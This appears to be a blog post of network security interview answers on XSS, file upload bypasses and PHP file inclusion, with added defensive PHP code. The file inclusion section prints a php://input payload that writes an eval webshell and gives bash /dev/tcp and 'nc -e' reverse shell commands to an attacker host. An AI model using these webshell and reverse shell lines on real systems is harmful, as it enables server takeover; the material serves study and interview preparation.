[XSS, file upload, file inclusion]


Preface

Collection of common interview questions for network security positions


Topics


1. XSS: vulnerability principle, classification, differences, hazards, protection, and how to detect it

Principle:
An XSS attack exploits a web application that was developed without strictly filtering user input. The attacker injects malicious script into a web page by some clever means, so that when other users load the page, their browsers execute the attacker's code.

Classification: reflected XSS, stored XSS, DOM XSS

Differences:
1. Attack type
Reflected XSS: non-persistent XSS, a one-time attack.
Stored XSS: persistent XSS; the malicious code or script constructed by the attacker is saved in the database, and every user who accesses the page is attacked.
DOM XSS: non-persistent XSS, based on the DOM (Document Object Model); no interaction with the server is required.
2. Traffic flow
Reflected XSS: browser -> backend -> browser
Stored XSS: browser -> backend -> database -> backend -> browser
DOM XSS: URL -> browser

Hazards:
- Steal all kinds of user accounts
- Steal user cookie data and impersonate the user on the website
- Hijack user sessions and perform arbitrary operations
- Generate fraudulent traffic and show pop-up ads
- Spread XSS worms

Protection:
1. Strictly filter user input with blacklists and whitelists (for keywords such as script, alert, onerror), and eliminate all unnecessary input as far as possible.
2. Encode, decode and escape user input in the appropriate output context.
3. Set the HttpOnly attribute on cookies so that cookie values cannot be read by JavaScript; this effectively prevents XSS from stealing the session cookie.
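The following is an added example, not code from the original post: it shows protections 2 and 3 in PHP, with a constructed reflected-XSS payload rendered once unsafely and once through context-aware encoding, plus an HttpOnly session cookie. The function names are assumptions.

```php
<?php
// Added example (not from the original post): context-aware output encoding
// and an HttpOnly session cookie, the two defenses listed above.

// Encode untrusted data before placing it in HTML text or attribute values.
// ENT_QUOTES also encodes single quotes, so attribute values stay closed.
function encode_html(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode untrusted data destined for a JavaScript string literal inside <script>.
// The JSON_HEX_* flags turn < > ' " & into \uXXXX escapes, so a value
// containing "</script>" cannot break out of the script block.
function encode_js(string $untrusted): string
{
    return json_encode($untrusted, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed sample input of the kind a reflected XSS test would send.
$name = '<img src=x onerror=alert(1)>';

// Vulnerable: the raw value is reflected into the page and the browser runs it.
$vulnerable = "<p>Hello, $name</p>";

// Hardened: the same value rendered as inert text.
$hardened = '<p>Hello, ' . encode_html($name) . '</p>';
// -> <p>Hello, &lt;img src=x onerror=alert(1)&gt;</p>

$script = '<script>var user = ' . encode_js($name) . ';</script>';
// -> <script>var user = "\u003Cimg src=x onerror=alert(1)\u003E";</script>

// Mark the session cookie HttpOnly (and Secure/SameSite) before session_start():
// document.cookie no longer exposes it, so even a successful injection
// cannot read the session ID.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();
echo $hardened, $script;
```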

How to detect:
1. Manual testing: try injecting test strings wherever an injection point may exist.
2. Automated tool detection: for example, install an XSS detection extension in Burp Suite and fuzz the candidate injection points, or run an automated vulnerability scanner such as AWVS or AppScan.


2. File upload vulnerabilities: principle, bypass methods, prerequisites for exploitation, and protection

Principle:
1. The web application exposes a file upload function but does not restrict uploaded files sufficiently (file suffix, file content, and so on).
2. When developing and deploying the program, system-specific behaviour and lax filtering are not taken into account.
3. An attacker can bypass the restrictions, possibly with the help of a web server parsing vulnerability, and upload arbitrary files.

Bypass methods:
Client-side bypass:
1. Remove the browser event handler (onsubmit)
2. Capture the request with Burp and modify the suffix
3. Construct your own upload form
Server-side detection bypass:
1. Suffix detection and bypass
   1. Case bypass
   2. Blacklist bypass (e.g. when httpd.conf contains AddType application/x-httpd-php .php3)
   3. Windows features (trailing dot, trailing space, ::$DATA)
   4. Whitelist (requires a file inclusion or parsing vulnerability to cooperate)
   5. .htaccess (requires AllowOverride All in httpd.conf; write SetHandler application/x-httpd-php for .jpg into the .htaccess)
   6. Apache parsing vulnerability (suffix parsed from right to left)
2. MIME type detection and bypass
3. File content detection and bypass
4. %00 (null byte) truncation detection and bypass
5. Race condition detection and bypass

Prerequisites for exploitation:
1. The web server has the file upload function enabled and web users can reach it.
2. Web users have write permission on the target directory, and possibly execute permission as well.
3. The web container can parse and execute the uploaded script.

Protection:
1. Enable both client-side and server-side file name verification, and use whitelist checking.
2. File header verification: check that the file header (magic bytes) of the uploaded file matches its extension.
3. Isolate uploaded files from the web server: store them on a dedicated file server and access them through file IDs. If the files must stay on the web server, remove execute permission from the directory that holds them.
4. Randomly rename uploaded files.
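An added example, not from the original post, showing an upload handler that applies the four protections above in PHP. The upload directory, the allowed-type map and the function name are assumptions.

```php
<?php
// Added example (not from the original post): a server-side upload check
// applying the four protections above. Paths and names are assumptions.

const UPLOAD_DIR = '/var/app/uploads';   // outside the web root, no execute bit
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the stored file ID on success, or throws when any check fails.
function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // 1. Whitelist the extension. strtolower defeats the case bypass; using
    //    only the final suffix means "shell.php.jpg" is judged by ".jpg" and
    //    stored under a fresh name, so right-to-left parsing cannot help.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Check the real content, not the client-supplied Content-Type:
    //    finfo reads the magic bytes, and getimagesize must agree with them.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $info = @getimagesize($file['tmp_name']);
    if ($mime !== ALLOWED[$ext] || $info === false || $info['mime'] !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // 4. Random name: the original file name (and any %00, ::$DATA or
    //    trailing dot/space tricks in it) never reaches the filesystem.
    $id = bin2hex(random_bytes(16));
    $dest = UPLOAD_DIR . '/' . $id . '.' . $ext;
    // 3. The file lands outside the document root and is later served by ID
    //    through a read-only download handler, never executed by the server.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $id;
}

// Usage with PHP's $_FILES array, e.g. <input type="file" name="avatar">:
// $id = store_upload($_FILES['avatar']);
```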


3. File inclusion: principle, classification, common functions and pseudo-protocols, protection, exploitation to obtain a webshell, and reverse shells

**Principle:** Developers generally want their code to be flexible, so they put reusable functions into separate files and make the name of the included file a variable for dynamic calls. Because the user can control that variable and the server fails to check it properly (or the check can be bypassed), a file inclusion vulnerability arises.

Classification:
File inclusion vulnerabilities come in two types: local file inclusion (LFI) and remote file inclusion (RFI).
The easiest way to tell them apart is to check whether allow_url_include is enabled in php.ini; if it is, remote files may be included.
Remote file inclusion requires allow_url_include=On and allow_url_fopen=On in php.ini.
In php.ini, allow_url_fopen has always defaulted to On, while allow_url_include has defaulted to Off since PHP 5.2.

Commonly used functions:
include(): the file is only included when the include() statement executes. If the file is not found, a warning is generated and the rest of the script keeps running.
require(): the file is included as soon as the program runs. If the file is not found, a fatal error is raised and script execution terminates.
include_once() and require_once(): if the file has already been included, it is not included a second time.

Commonly used pseudo-protocols:
1. php://input
Example: POST the body <?php fputs(fopen("hepeng.php","w"),"<?php @eval($_POST[123]); ?>" ); ?>
Command execution can also be submitted via POST:
<?php system(echo "One sentence Trojan" > current absolute path/hepeng.php); ?>
2. php://filter
Example:
?a=php://filter/read=convert.base64-encode/resource=index.php
?a=php://filter/convert.base64-encode/resource=index.php
3. data://
Example:
?a=data://text/plain,<One sentence Trojan>
?a=data://text/plain;base64,ciphertext
4. phar://
?a=phar://absolute path/hepeng.jpg(zip)/b.txt
5. zip://
?a=zip://absolute path/hepeng.jpg%23b.txt
Also file://, http://, and ftp://.

Protection:
1. Strictly check whether the parameter passed to the include is externally controllable, because the key to a successful file inclusion attack is whether the included file can be controlled from outside.
2. Path restriction: restrict included files to a specific directory, and forbid directory traversal sequences such as "../".
3. Included file verification: verify that the included file is a member of a whitelist.
4. Avoid dynamic inclusion where possible; write the include directly into the page that needs it, for example include("test.php");
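An added example, not from the original post, implementing protections 1 to 4 above as a PHP include wrapper: the request parameter is only ever a whitelist key, the resolved path is confirmed to lie inside a fixed directory, and the inputs from the pseudo-protocol list are refused. The page directory and page names are assumptions.

```php
<?php
// Added example (not from the original post): a whitelist-based include
// wrapper. PAGE_DIR and the page names are assumptions.

const PAGE_DIR = __DIR__ . '/pages';
// Protections 3 and 4: map request keys to fixed files. The request never
// supplies a path, so there is nothing to traverse or wrap in php://filter.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Resolves a request parameter to an include path, or null if rejected.
function resolve_page(string $requested): ?string
{
    // Protection 1: the externally controllable value is only a key.
    if (!isset(PAGES[$requested])) {
        return null;
    }
    // Protection 2: confirm the resolved real path is still inside PAGE_DIR
    // (guards against a symlink or a bad map entry); no "../" can survive.
    $real = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed inputs of the kinds listed above; each is refused because it
// is not a whitelist key, regardless of any wrapper or traversal it carries.
$rejected = [
    '../../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=index.php',
    'data://text/plain,<constructed payload>',
    'http://attacker.example/shell.txt',
];
foreach ($rejected as $r) {
    assert(resolve_page($r) === null);
}

$page = resolve_page($_GET['a'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('not found');
}
include $page;   // only ever one of the fixed files in PAGE_DIR
```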

How to exploit it and obtain a webshell:
1. Uploaded file inclusion: use the inclusion vulnerability to load PHP code that the user uploaded, achieving code execution. The attacker needs to know the physical storage path of the uploaded file and needs execute permission on the directory that holds it.
2. Log file inclusion: an attacker inserts PHP code into a web server log and then executes it by including the log file through the inclusion vulnerability.
3. Sensitive file inclusion: file inclusion can directly read sensitive operating system files, such as system information, username and password data, and various configuration files.
4. Temporary file inclusion: take the session file as an example. The session file is stored on the server and holds sensitive user data; find the session file and include it. The file name can be found by viewing the current session value in a browser plug-in.
5. Remote file inclusion: first determine whether PHP has the remote file inclusion option turned on; it is set in php.ini, and the web container must be restarted for a change to take effect. It can be used to obtain the server's information remotely.
6. Pseudo-protocol exploitation: use file inclusion together with the various PHP stream wrappers (pseudo-protocols) to write a one-sentence Trojan, then connect with tools such as China Chopper or AntSword to obtain a webshell.

Reverse shell:
1. bash
On the attacking host, listen on a port (port is an unused port number on the attacking host):
nc -lvp port
On the target host, execute:
bash -i >& /dev/tcp/attacker ip/port 0>&1
2. nc (netcat) reverse shell
On the attacking host, listen on a port (port is an unused port number on the attacking host):
nc -lvvp port
On the target host, execute:
nc -e /bin/bash attacker ip port
3. Reverse shells in common scripting languages
Python, Perl, Ruby, PHP, Java

This is only a brief introduction; a detailed explanation of reverse shells will follow in a later post.


Summary

This post briefly introduces a few questions; we will keep updating it in the future, so stay tuned!
Come on, fellow workers!!! Woo woo woo

Origin blog.csdn.net/qq_61872115/article/details/126076599